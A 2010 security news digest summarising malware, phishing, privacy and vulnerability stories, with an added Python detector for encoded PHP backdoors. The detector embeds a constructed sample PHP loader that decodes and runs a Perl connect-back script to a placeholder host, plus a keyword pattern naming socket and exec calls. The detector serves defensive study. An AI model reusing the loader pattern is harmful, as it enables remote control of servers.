
NEWS - September 06, 2010

by Donna Buenaventura / September 5, 2010 10:07 PM PDT
Every week 57,000 fake Web addresses try to infect users

Every week, hackers are creating 57,000 new Web addresses which they position and index on leading search engines in the hope that unwary users will click them by mistake.

Those who do will see their computers infected or any data they enter on these pages fall into the hands of criminals. To do this, they use an average of 375 company brands and names of private institutions from all over the world, all of them instantly recognizable.

eBay, Western Union and Visa top the rankings of the most frequently used keywords; followed by Amazon, Bank of America, Paypal and the US revenue service.

These are the conclusions of a study carried out by PandaLabs, which has monitored and analyzed the major blackhat SEO attacks of the last three months.

Some 65% of these fake websites are positioned as belonging to banks. For the most part, they pose as banks in order to steal users' login credentials. Online stores and auction sites are also popular (27%), with eBay the most widely used.

Other financial institutions (such as investment funds or stockbrokers) and government organizations occupy the following positions, with 2.3% and 1.9% respectively. The latter is largely accounted for by the US revenue service or other tax collecting agencies.

Payment platforms, led by Paypal, and ISPs are in fifth and sixth place, while gaming sites, topped by World of Warcraft, complete the ranking.

http://www.net-security.org/malware_news.php?id=1456
Kirstie Allsopp's Twitter account hacked by iPad spammers
by Donna Buenaventura / September 5, 2010 10:10 PM PDT

Plummy-voiced property crumpet Kirstie Allsopp has fallen foul of hackers on Twitter, who posted messages pointing to free iPad scams this weekend from her account.

The British TV presenter, best known for her Channel 4 property programmes "Location, Location, Location" and "Kirstie's Homemade Home", only found out that her account had been hacked when some of her 47,000 Twitter followers alerted her to the out-of-character tweets.

The links took unsuspecting fans to webpages which encouraged them to apply for free iPads by handing over personal information and signing up for scams that charged

Google pays $8.5m to settle Buzz privacy invasion suit
by Donna Buenaventura / September 5, 2010 10:12 PM PDT

The price of a Tweetbookish Gmail mod

Google has agreed to pay $8.5 million to settle a class action lawsuit claiming it violated the privacy of Gmail users when it released Google Buzz, a Gmail bolt-on that turned the email service into a Tweetbookish social networking tool.

The suit in question consolidates several civil cases filed against the company over Google Buzz, which was rolled out to all Gmail users in February, before it had been publicly tested. By default, Buzz automatically exposed users' most frequent Gmail contacts to the public internet. You did have the option of hiding the list from the public view, but many complained that the checkbox that let you do so was less than prominently displayed.

Within days, Google agreed to move the checkbox to a more prominent position, and it rejiggered the way it handles user contacts. But this didn't prevent a spate of lawsuits.

http://www.theregister.co.uk/2010/09/05/google_buzz_suit_settlement/

PHP Backdoor Has Another Backdoor Inside
by Donna Buenaventura / September 5, 2010 10:39 PM PDT

Is there no honor among thieves anymore?

The other day I was looking at a remote access Trojan written in the PHP scripting language. The bot loads into memory on a victim's computer when an unsuspecting user, for example, stumbles upon an iframe pointing to the PHP script embedded in a Web page. The code is nicely appointed with such desirable features as the ability to execute shell commands on the host server, send a flood of data packets at another computer, and scan remote computers.

Once loaded into a victim's browser, the bot connects to, and is capable of executing commands issued by, a botnet server until the victim reboots their computer. But for most users, that's probably long enough. If an attacker can execute commands on an infected user's computer, installing more Trojans is just child's play.

But someone appears to have embedded a surprise into this PHP backdoor: It's another backdoor within the backdoor.

I'm not even going to try to understand why whoever is distributing the bot's source code chose to name the Web domain where they'd store a Trojan getemgirlfriday.com. Perhaps a closet Howard Hawks or Rosalind Russell fan camps out among the malcode community. Wonderful, in a loathsome sort of way. All I know is, someone's bugged this bug with another bug. [...]

Once decoded, the meaning of $dc_source becomes clear. The bot writes out the decoded commands into a Perl script then executes them. The commands instruct the bot to connect elsewhere. Were I the criminally minded type to use such a bot, I'm not sure I'd be particularly happy to discover the "Data Cha0s Connect Back Backdoor" on my server. I suppose that's why the page hosting the code offers the following overblown expression of gratitude from the group distributing the code

http://blog.webroot.com/2010/09/06/php-backdoor-has-another-backdoor-inside/
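The pattern the post describes, an encoded string literal that the bot decodes and runs at run time, is something a defender can scan PHP sources for. The detector below is an added example, not code from the post or the Webroot article; the PHP fragment, the Perl payload and the callback host are constructed placeholders.

```python
import base64
import re

# Constructed stand-in for the decoded $dc_source payload (the real script is
# not reproduced here); the callback host is a placeholder.
PAYLOAD = (
    "#!/usr/bin/perl\n"
    "use IO::Socket;\n"
    "my $s = IO::Socket::INET->new(PeerAddr => 'callback.example.invalid', PeerPort => 4444);\n"
)

# Constructed PHP bot fragment: the payload sits base64-encoded in a variable
# and is decoded, written to disk and executed at run time, as the post describes.
SAMPLE_PHP = (
    '<?php\n'
    '$dc_source = "' + base64.b64encode(PAYLOAD.encode()).decode() + '";\n'
    'file_put_contents("/tmp/dc.pl", base64_decode($dc_source));\n'
    'system("perl /tmp/dc.pl");\n'
)

# A string literal of 40+ base64 characters assigned to a PHP variable.
ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*["\']([A-Za-z0-9+/=\s]{40,})["\']')
HOST_RE = re.compile(r'\b[a-z0-9-]+(?:\.[a-z0-9-]+)+\b')
KEYWORDS = ("perl", "socket", "connect", "exec", "system", "fsockopen")


def _is_text(data: bytes) -> bool:
    """Only report blobs that decode to (almost entirely) printable ASCII."""
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in data)
    return bool(data) and printable / len(data) > 0.95


def scan_php(source: str) -> list:
    """Return one finding per encoded literal, with the indicators it hides."""
    findings = []
    for m in ASSIGN_RE.finditer(source):
        blob = re.sub(r'\s+', '', m.group(2))
        try:
            decoded = base64.b64decode(blob, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if not _is_text(decoded):
            continue
        text = decoded.decode('ascii', 'replace').lower()
        findings.append({
            'variable': m.group(1),
            'hosts': sorted(set(HOST_RE.findall(text))),
            'keywords': [k for k in KEYWORDS if k in text],
            # True when the same variable is fed to base64_decode() somewhere.
            'decoded_at_runtime': bool(re.search(
                r'base64_decode\(\s*\$' + re.escape(m.group(1)) + r'\b', source)),
        })
    return findings
```

Run `scan_php()` over each PHP file on a suspect host; a finding whose decoded text names a host and a connect-back keyword is the case the post describes.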

VISA Blocks ePassporte
by Donna Buenaventura / September 5, 2010 10:42 PM PDT

Credit card giant VISA International has suspended its business with ePassporte, an Internet payment system commonly used to pay adult Webmasters and a raft of other affiliate programs.

Company owner Christopher Mallick broke the news to ePassporte customers in an e-mail sent Thursday, saying Visa International had suspended the company's ePassporte Visa program, which is processed through St. Kitts Nevis Anguilla National Bank. [...]

ePassporte's Visa Virtual Account allowed customers to pay online at any Website that accepted Visa cards. The program also issued customers physical cards that could be used to withdraw cash at ATMs around the globe.

I reached out to both Mallick and Visa for further details and will update this blog if I hear from either.

This news caught my attention because I have recently encountered ePassporte accounts tied to several shady affiliate programs, such as those used to reward people who promote rogue anti-virus products and online pharmacy sites.

A number of adult Webmaster forums are buzzing with the news, but few seem to know more than what's in the statement from ePassporte. However, the administrator of the online forum italkcash.com suggests that the move by Visa is in response to new anti-money laundering requirements mandated by the Credit Card Act of 2009, which affects prepaid cards and other payment card instruments that can be reloaded with funds at places other than financial institutions.

http://krebsonsecurity.com/2010/09/visa-blocks-epassporte/

Flash Player as a spy system
by Donna Buenaventura / September 6, 2010 2:59 AM PDT

If a forged certificate is accepted when accessing the Flash Player's Settings Manager, which is available exclusively online, attackers can potentially manipulate the player's website privacy settings. This allows a web page to access a computer's web cams and microphones and remotely turn the computer into a covert listening device or surveillance camera.

At the "Meta Rhein Main Chaos Days 111b" (German language link), Fraunhofer SIT employee Alexander Klink presented a scenario in which he used a man-in-the-middle attack (MiTM) to intercept the communication with Adobe's Settings Manager. The Settings Manager itself is a simple Flash applet, and the Adobe pages load it into the browser as an SWF file via HTTPS; a fixed link to it is encoded into the browser. [...]

While attackers need their potential victims to co-operate and accept a forged certificate in order to hack the SSL connection, an error when accessing one of Adobe's Macromedia pages is unlikely to cause much suspicion. Adobe has been informed about the problem and is considering whether to release a new GUI for the Settings Manager. Klink suggests that a warning be displayed when a user accesses certain APIs of external pages. Another alternative is to set the "AVHardwareDisable = 1" option in the mms.cfg configuration file, which completely disables Flash Player's access to audio and video hardware. The location of this file is revealed in a tech note by Adobe.

http://www.h-online.com/security/news/item/Flash-Player-as-a-spy-system-1073161.html

Data theft in IE via two-year old vulnerability
by Donna Buenaventura / September 6, 2010 3:03 AM PDT
Data theft in Internet Explorer via two-year old vulnerability

A long known vulnerability in Internet Explorer 8 allows attackers to bypass the same origin policy by loading cascading style sheets (CSS) which enables them to gain access to victims' personal data. Google Information Security Engineer Chris Evans has demonstrated the vulnerability by means of an exploit aimed at Twitter, but which can also be applied to other websites. If a user visiting the specially crafted webpage is logged into the micro-blogging service, the page extracts the user's authentication token from a Twitter page and is able to post unlimited messages in the user's account.

The vulnerability was first disclosed around two years ago and was reported to affect all major browsers. The report, in Japanese, appears, however, to have gone unnoticed. It was a further year before other browser vendors reacted and one by one fixed the problem, after Evans drew attention to the hazard on his blog. With Mozilla finally reacting to the issue in July with Firefox 3.6.7, Internet Explorer is now the only browser the latest version of which (as well as older versions) remains vulnerable. Since the attack does not require JavaScript, there is no way at present for Internet Explorer users to protect themselves, apart from using a different, non-vulnerable browser.

http://www.h-online.com/security/news/item/Data-theft-in-Internet-Explorer-via-two-year-old-vulnerability-1073488.html
TechCrunch Europe hacked
by Donna Buenaventura / September 6, 2010 11:02 AM PDT

The eagle-eyed harmony guy spotted about an hour ago that some malicious code had been added to the WordPress installation over at TechCrunch Europe.

The code redirects to a host which is serving up malicious PDF files. The PDFs are designed to exploit a vulnerability which leads to the download of that Poison Ivy of the criminal underworld, ZeuS.

The malicious server is hosted by Netdirect over in Frankfurt Germany, a provider with a relatively colourful history of their own.

The file itself has very low detection rates at present and only serves to underline the need for a security solution that considers the threat as a whole instead of focusing on one aspect of the threat.

http://countermeasures.trendmicro.eu/techcrunch-europe-hacked/

Symantec finally secures HackIsWack
by Donna Buenaventura / September 6, 2010 11:07 AM PDT

Symantec has belatedly secured its laughable HackIsWack competition website.

The site - a collaboration between the security software firm and rapper Snoop Dogg - is designed to raise awareness about malware and identity theft by providing a forum for a user-generated cybercrime-themed rap competition. The site had a slow start, and currently boasts an underwhelming 22 videos.

Reg commentards have described the campaign as the most comically inept since the Don't Copy that Floppy anti-piracy screed of the 1990s, an earlier rap music meets security multi-purpose fail.

Even more embarrassingly the security giant went live with a branded site that was riddled with security holes, including a cross-site scripting flaw that amusingly lent itself to a rickrolling attack. In a statement issued over the weekend, Symantec acknowledged the problems, which it said were now resolved.

Symantec was made aware of reported vulnerabilities to the Norton Hack is Wack microsite, and we quickly took the necessary steps to enhance security on the site. We have found no evidence to date that any intrusion into the site or other areas of Symantec's network or website have occurred.

To date, Symantec can confirm that no company or customer data has been compromised or exposed. Symantec takes the security of our website and microsites very seriously, and we have taken the necessary steps to resolve this issue.

http://www.theregister.co.uk/2010/09/06/hackiswack_secure/

New Spam Worm on Facebook
by Donna Buenaventura / September 6, 2010 11:12 AM PDT

A clever spammer has discovered a Facebook vulnerability that allows for auto-replicating links. Until now, typical Facebook spam has required the use of some social engineering to spread.

But clicking on any of these application spam links is enough to "share" the application to the user's Wall.

Note that each of the search results was posted "via Mobile Web", which suggests that a common bug is being exploited. Or perhaps the spammer is posting via m.facebook as it's generally more responsive than the main site.

It's also interesting that the application links seem almost polymorphic or Captcha-like.

All of the links that we tested resulted in a page not found, so Facebook appears to have halted the worm's progress.

http://www.f-secure.com/weblog/archives/00002024.html
